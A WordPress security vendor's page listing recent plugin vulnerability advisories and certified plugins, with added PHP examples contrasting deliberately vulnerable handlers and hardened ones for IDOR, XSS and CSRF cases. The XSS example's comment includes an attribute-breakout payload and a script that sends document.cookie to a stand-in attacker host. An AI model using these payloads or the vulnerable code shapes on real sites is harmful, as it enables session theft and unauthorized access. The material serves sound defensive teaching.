CleanTalk

Vulnerabilities and Security Research

Recent vulnerability research

CVE/PSC | Application | Status | Date | Affected versions (Min / Max) | Description
Actual on: Jun 17, 2026, 05:06:48

CVE-2026-10780 | Static Block | vulnerable | Jun 17, 2026, 10:06:32 | Min - / Max 2.2
The Static Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2. This is due to the static_block_content() shortcode handler retrieving a post via get_post() using an attacker-supplied 'id' attribute and outputting its post_content without verifying the post's status (private, draft, pending) or the requesting user's capability to view it. This makes it possible for authenticated attackers, with contributor-level access and above, to read the...
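As an added illustration of the bug class in this entry (this is not the Static Block plugin's own code; the shortcode tag, the `demo_block` post type and the function names are assumptions), a shortcode handler in the shape the advisory describes, followed by a hardened version that checks post type, post status and the viewer's `read_post` capability before echoing stored content:

```php
<?php
/**
 * Added illustration, not the Static Block plugin's code.
 * Assumed: shortcode tag 'demo_static_block', attribute 'id',
 * and a custom post type 'demo_block' that the blocks live in.
 */

// Vulnerable shape: whatever ID the shortcode carries is fetched and its
// content echoed, regardless of status (draft/private/pending), post type,
// or whether the person rendering the page may read it. A contributor who
// can write [demo_static_block id="123"] into a draft and preview it reads
// post 123, whatever it is.
function demo_static_block_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'demo_static_block' );
    $post = get_post( (int) $atts['id'] );
    if ( ! $post ) {
        return '';
    }
    return do_shortcode( wpautop( $post->post_content ) );
}

// Hardened shape. Three checks the vulnerable version lacks:
//  1. post type: the ID must refer to one of the plugin's own blocks, not an
//     arbitrary page, revision or other private object;
//  2. status: non-published posts are only shown to users who hold the
//     'read_post' meta capability for that specific post (this already
//     handles private posts and author ownership);
//  3. password-protected posts are not shown unless the viewer unlocked them.
function demo_static_block_hardened( $atts ) {
    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'demo_static_block' );
    $id   = absint( $atts['id'] );
    $post = $id ? get_post( $id ) : null;

    if ( ! $post || 'demo_block' !== $post->post_type ) {   // assumed CPT name
        return '';
    }
    if ( 'publish' !== get_post_status( $post ) && ! current_user_can( 'read_post', $post->ID ) ) {
        return '';
    }
    if ( post_password_required( $post ) ) {
        return '';
    }
    return do_shortcode( wpautop( $post->post_content ) );
}

add_shortcode( 'demo_static_block', 'demo_static_block_hardened' );
```

The capability check runs at render time, so it applies to whoever is viewing the page that contains the shortcode, including the contributor previewing their own draft; that is the path the advisory describes, and it is closed by the `read_post` check rather than by any check at the time the shortcode is saved.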

CVE-2026-49080 | wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin | vulnerable | Jun 16, 2026, 22:06:17 | Min - / Max 7.4
wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin [wpdatatables] < 7.4 CVE-2026-49080

CVE-2026-49772 | The Events Calendar | vulnerable | Jun 16, 2026, 18:06:49 | Min - / Max 6.16.3
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Liquid Web / StellarWP The Events Calendar allows Blind SQL Injection. This issue affects The Events Calendar: from 6.15.12 through 6.16.2.

CVE-2026-2381 | WooCommerce Stripe Payment Gateway | vulnerable | Jun 16, 2026, 17:06:52 | Min - / Max 10.8.0
The WooCommerce Stripe Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_pay_for_order()` function in all versions up to, and including, 10.7.0. This is due to a missing order ownership or order_key verification when processing payment for an order via the `wc_stripe_pay_for_order` WC-AJAX endpoint. The function only validates a nonce (which is publicly available on any WooCommerce page where Express Checkout is enabled), bu...

753d31765913b4d2dbb8af0a5512e5f1f8c70c61 | leenk.me | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 2.5.1
leenk.me [leenkme] < 2.5.1 (closed) WordPress leenk.me Plugin 2.5.0 - Multiple Vulnerabilities. The WordPress leenk.me plugin is prone to cross-site request forgery and cross-site scripting vulnerabilities via the vulnerable page wp-content/plugins/leenkme/facebook.php. Vulnerable fields include "facebook_message", "facebook_description", "default_image", "facebook_linkname", etc. Upgrade the plugin.

5abd4657-8a58-4d97-b8cb-b67235ab5b8a | Social Hashtags | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 2.0.0
Social Hashtags [social-hashtags] <= 2.0.0 (unfixed) Social Hashtags 2.0.0 - New Post Title Field Stored XSS. The Social Hashtags WordPress plugin was affected by a stored XSS vulnerability in the New Post Title field.

1965c7b04565befbb11c28b56cb6922733a47b03 | Social Hashtags | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 2.0.1
Social Hashtags [social-hashtags] < 2.0.1 WordPress Social Hashtags Plugin <= 2.0.0 is vulnerable to Cross Site Scripting (XSS). Update the plugin. Arsan discovered and reported this Cross Site Scripting (XSS) vulnerability in the WordPress Social Hashtags Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website, which will be executed when guests visit your site. This vulnerability has been fixed in version 2.0.1.

a7cf6766582e354e702766a86f85716127d19bdc | Social Hashtags | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 3.0.0
Social Hashtags [social-hashtags] <= 3.0.0 (unfixed) Social Hashtags <= 3.0.0 - Cross-Site Scripting. The Social Hashtags plugin for WordPress is vulnerable to Cross-Site Scripting via the new post title field in versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts that execute in a victim's browser.
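The three Social Hashtags entries above all come down to the same missing discipline, "insufficient input sanitization and output escaping". As an added illustration (this is not the Social Hashtags plugin's code; the option name, field name, nonce action and capability are assumptions), a settings field handled the vulnerable way and then the hardened way:

```php
<?php
/**
 * Added illustration, not the Social Hashtags plugin's code.
 * Assumed: option 'demo_post_title', POST field 'post_title',
 * nonce action 'demo_save_title', capability 'manage_options'.
 */

// Vulnerable shape: the raw POST value is stored and the raw option is
// echoed back into an attribute and into the page body. A value such as
//   " autofocus onfocus="alert(document.cookie)
// breaks out of the attribute, and
//   <script>location='https://attacker.example/?c='+document.cookie</script>
// runs for every admin who opens the settings page and every visitor who
// sees the title rendered on the front end.
function demo_save_title_vulnerable() {
    update_option( 'demo_post_title', $_POST['post_title'] );
}
function demo_render_title_vulnerable() {
    $title = get_option( 'demo_post_title' );
    echo '<input name="post_title" value="' . $title . '">';
    echo '<h2>' . $title . '</h2>';
}

// Hardened shape.
//  - Who may write: a nonce (CSRF) and a capability check.
//  - Sanitize on the way in: sanitize_text_field() strips tags, line breaks
//    and invalid bytes. It deliberately leaves quotes alone, so on its own it
//    does NOT stop the attribute breakout above.
//  - Escape on the way out, for the exact context: esc_attr() inside an
//    attribute, esc_html() in element content. This is the control that
//    stops the payload regardless of what reached the database.
function demo_save_title_hardened() {
    check_admin_referer( 'demo_save_title' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    $title = sanitize_text_field( wp_unslash( $_POST['post_title'] ?? '' ) );
    update_option( 'demo_post_title', $title );
}
function demo_render_title_hardened() {
    $title = get_option( 'demo_post_title', '' );
    echo '<input name="post_title" value="' . esc_attr( $title ) . '">';
    echo '<h2>' . esc_html( $title ) . '</h2>';
}
```

When reviewing a plugin for this class of bug, look at the output side first: a field that is escaped correctly at every echo is safe even if the save path is sloppy, whereas sanitization alone is context-blind and leaves the attribute and JavaScript-string contexts open.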

e98a6264-9c5a-417f-b2f8-bd0017b411a0 | Simple Calendar – Google Calendar Plugin | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 3.2.5
Simple Calendar – Google Calendar Plugin [google-calendar-events] < 3.2.5 Simple Calendar < 3.2.5 - Cross-Site Request Forgery via duplicate_feed. The Simple Calendar – Google Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 3.2.5 (exclusive). This is due to missing or incorrect nonce validation on the duplicate_feed function. This makes it possible for unauthenticated attackers to duplicate feeds via a forged request granted they can t...

3d3bbf542efa380d1c9c1f006aff813662cd771e | Simple Calendar – Google Calendar Plugin | vulnerable | Jun 16, 2026, 11:06:20 | Min - / Max 3.2.5
Simple Calendar – Google Calendar Plugin [google-calendar-events] < 3.2.5 Simple Calendar <= 3.2.4 - Cross-Site Request Forgery via duplicate_feed. The Simple Calendar – Google Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 3.2.5 (exclusive). This is due to missing or incorrect nonce validation on the duplicate_feed function. This makes it possible for unauthenticated attackers to duplicate feeds via a forged request granted they can trick a s...
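The WooCommerce Stripe entry (CVE-2026-2381) and the two Simple Calendar entries are mirror images: one handler had a nonce but no ownership check, the other had no nonce at all. A nonce only proves the request originated from a page the browser loaded; it says nothing about whether the caller may act on the object named in the request. As an added illustration (this is not code from either plugin; it uses admin-ajax rather than the WC-AJAX endpoint, and the action names, nonce actions, field names and the `manage_options` capability are assumptions), a pay-for-order handler with only a nonce, the same handler with ownership and state checks added, and an admin action of the duplicate_feed kind with both a nonce and a capability check:

```php
<?php
/**
 * Added illustration, not WooCommerce Stripe's or Simple Calendar's code.
 * Assumed: admin-ajax actions 'demo_pay_for_order' and 'demo_duplicate_feed',
 * nonce actions 'demo-pay-for-order' and 'demo-duplicate-feed_<id>',
 * POST fields order_id / order_key, GET field feed_id.
 */

// Vulnerable shape: the nonce is checked, nothing else. If the nonce is
// printed on every page where express checkout renders, any visitor has it,
// and can drive the payment flow for any order ID they can guess.
function demo_pay_for_order_vulnerable() {
    check_ajax_referer( 'demo-pay-for-order', 'security' );
    $order = wc_get_order( absint( $_POST['order_id'] ?? 0 ) );
    if ( ! $order ) {
        wp_send_json_error( 'invalid order', 404 );
    }
    // ... create the payment for $order ...
    wp_send_json_success();
}

// Hardened shape: CSRF check, then authorization for *this* order, then state.
function demo_pay_for_order_hardened() {
    // 1. CSRF: the request must carry a valid nonce for this action.
    check_ajax_referer( 'demo-pay-for-order', 'security' );

    $order_id = absint( $_POST['order_id'] ?? 0 );
    $key      = isset( $_POST['order_key'] ) ? wc_clean( wp_unslash( $_POST['order_key'] ) ) : '';
    $order    = $order_id ? wc_get_order( $order_id ) : false;
    if ( ! $order ) {
        wp_send_json_error( 'invalid order', 404 );
    }

    // 2. Ownership: either the caller presents the order's secret key (the
    //    same one carried by WooCommerce's pay-for-order URL) or the caller is
    //    the logged-in customer who placed the order. hash_equals() keeps the
    //    key comparison constant-time.
    $owns_by_key  = '' !== $key && hash_equals( $order->get_order_key(), $key );
    $owns_by_user = is_user_logged_in() && (int) $order->get_user_id() === get_current_user_id();
    if ( ! $owns_by_key && ! $owns_by_user ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. State: only orders that are actually awaiting payment.
    if ( ! $order->needs_payment() ) {
        wp_send_json_error( 'order does not need payment', 400 );
    }
    // ... create the payment for $order ...
    wp_send_json_success( array( 'order_id' => $order->get_id() ) );
}
add_action( 'wp_ajax_demo_pay_for_order',        'demo_pay_for_order_hardened' );
add_action( 'wp_ajax_nopriv_demo_pay_for_order', 'demo_pay_for_order_hardened' );

// Admin-side action of the duplicate_feed kind. Here the gap was the reverse:
// an authenticated admin performs the action, but without a nonce an attacker
// only needs the admin to load a page that submits the request. The nonce is
// bound to the specific feed ID so a captured nonce cannot be replayed against
// another feed; the capability check then decides who may duplicate at all.
function demo_duplicate_feed() {
    $feed_id = absint( $_GET['feed_id'] ?? 0 );
    check_admin_referer( 'demo-duplicate-feed_' . $feed_id );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    // ... duplicate feed $feed_id ...
    wp_safe_redirect( wp_get_referer() ? wp_get_referer() : admin_url() );
    exit;
}
add_action( 'wp_ajax_demo_duplicate_feed', 'demo_duplicate_feed' );
```

The two handlers together give the checklist for any state-changing WordPress endpoint: nonce (request came from a page we served), capability (this kind of user may do this kind of thing), and object-level authorization (this user may do it to this object). Each advisory above is a case of one of the three being missing.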

Recent approved applications

Application | Date | Description
Actual on: Jun 17, 2026, 05:06:48

Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode | May 26, 2026, 14:05:16
Coming soon and landing page builders sit at the intersection of front-end publishing, access control, template rendering, subscriber collection, SEO metadata, and administrator-managed design content. That makes them high-value from a marketing perspective, but also security-sensitive because builder content often becomes public HTML and mode controls can determine who can see the site. Website Builder by SeedProd version 6.20.1 has successfully completed the CleanTalk Plugin Security Certification process...

Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels | May 26, 2026, 14:05:15
Image import plugins bridge WordPress with external media providers, proxy services, remote image URLs, metadata processing, and the local Media Library. That workflow improves publishing speed, but it also expands the attack surface around remote downloads, MIME validation, alt text and caption handling, attribution metadata, and editor integrations. Instant Images version 7.1.1 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64662, confirming that the p...

Custom Fonts – Host Your Fonts Locally | May 26, 2026, 14:05:13
Typography plugins appear presentation-oriented, but their core workflows involve file uploads, local asset hosting, generated CSS, editor integration, and front-end output. That combination can become security-sensitive when font files, font names, CSS rules, and generated asset paths are accepted from administrators or imported from external providers. Custom Fonts version 2.1.17 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64660, confirming that the...

FluentSMTP – WP Mail SMTP, Amazon SES, SendGrid, MailGun and Any SMTP Connector Plugin | May 26, 2026, 14:05:11
SMTP and email routing plugins hold highly sensitive operational data because they connect WordPress to external mail infrastructure, API credentials, OAuth-based providers, email logs, and resend workflows. Weak controls in this layer can expose tokens, disclose private email content, alter transactional mail routing, or allow unauthorized users to resend messages. FluentSMTP version 2.2.95 has successfully completed the CleanTalk Plugin Security Certification process and received PSC-2026-64658, confirmin...

SiteGuard WP Plugin | May 26, 2026, 14:05:10
Login hardening plugins operate directly on WordPress authentication, administration access, CAPTCHA behavior, lockout logic, and security notifications. That position gives them defensive value, but it also creates a high-impact attack surface: weak validation or unsafe configuration handling can cause lockout bypass, administrator denial of service, sensitive path disclosure, or unauthorized modification of protection rules. SiteGuard WP Plugin version 1.7.12 has successfully completed the CleanTalk Plugi...

Advanced Editor Tools | May 01, 2026, 14:05:56
Editor enhancement plugins operate directly on the boundary between content creation, rich-text formatting, block editor behavior, Classic Editor compatibility, and front-end rendering. These plugins influence how authors create content, how formatting is stored, how editor settings are applied, and how HTML produced by rich-text tools eventually appears on public pages. A weakness in this class of plugin can lead to stored XSS through editor content or settings, unauthorized configuration changes, unsafe h...

Really Simple SSL | May 01, 2026, 14:05:56
Security and SSL enforcement plugins operate across some of the most sensitive trust boundaries in WordPress because they can influence HTTPS migration, redirect behavior, security headers, login protection, two-factor authentication, vulnerability detection, and site hardening controls. Weaknesses in this class of plugin can affect confidentiality, session safety, authentication integrity, administrative access control, or the reliability of security configuration across the entire site. Really Simple Secu...

WP Booking Calendar | Apr 28, 2026, 17:04:40
Booking and reservation plugins operate across a sensitive boundary between public form submission, calendar availability, customer-provided booking data, admin-side reservation management, and in some configurations external calendar synchronization. These plugins often process names, contact details, selected dates, time slots, service requests, event information, and notification templates, while also controlling whether a date or resource can be booked. A weakness in this class of plugin can lead to sto...

UiCore Animate | Apr 28, 2026, 17:04:40
Animation and interaction plugins operate on a sensitive boundary between front-end rendering, visual builder controls, Gutenberg block behavior, Elementor widget configuration, and client-side JavaScript execution. These plugins often modify how content appears, moves, loads, transitions between pages, and reacts to scrolling or user interaction. A weakness in this class of plugin can lead to stored XSS through animation settings, unsafe rendering of visual effects, unauthorized modification of design beha...

YayMail – WooCommerce Email Customizer | Apr 28, 2026, 17:04:40
WooCommerce email customization plugins operate on a sensitive boundary between order data, customer communication, template rendering, and admin-side content editing. These plugins often process customer names, billing and shipping details, order metadata, payment-related labels, coupons, custom fields, and transactional email content. A weakness in this class of plugin can lead to stored XSS in email templates or admin previews, unauthorized modification of transactional communications, data leakage throu...